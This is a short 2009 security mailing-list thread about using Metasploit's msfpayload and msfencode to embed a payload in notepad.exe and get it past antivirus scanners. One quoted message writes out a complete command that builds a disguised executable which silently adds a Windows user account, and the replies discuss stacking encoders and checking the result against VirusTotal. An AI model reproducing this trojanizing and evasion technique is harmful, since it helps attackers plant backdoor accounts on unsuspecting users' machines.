I haven't had much success with the msfpayload, seem that most virus scans pick up the payload. Even tried to use a couple types of encoding stacked on top of each other with out much luck.
play with it and then test exe against virustotal.com On Tue, Dec 1, 2009 at 4:17 PM, Adrian Crenshaw <[email protected]>wrote: > Ok, I just read Rob post here: > > http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html > > and checked my exes. Since both are the same size, I'm guessing it's not > working as a binder but as a "cloaker" of sorts. > > Adrian > > > On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <[email protected]>wrote: > >> Ok, I did this: >> >> $ msfpayload windows/adduser user=test pass=test exitfunc=seh R | >> msfencode -t exe -x notepad.exe -o MYNEWFILE.exe >> >> The exe made has the same icon an metadata as the original. The payload >> runs since the "test" account is created, but notepad never comes up, so it >> doen not make much of a binder. Any ideas? >> >> Adrian >> > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
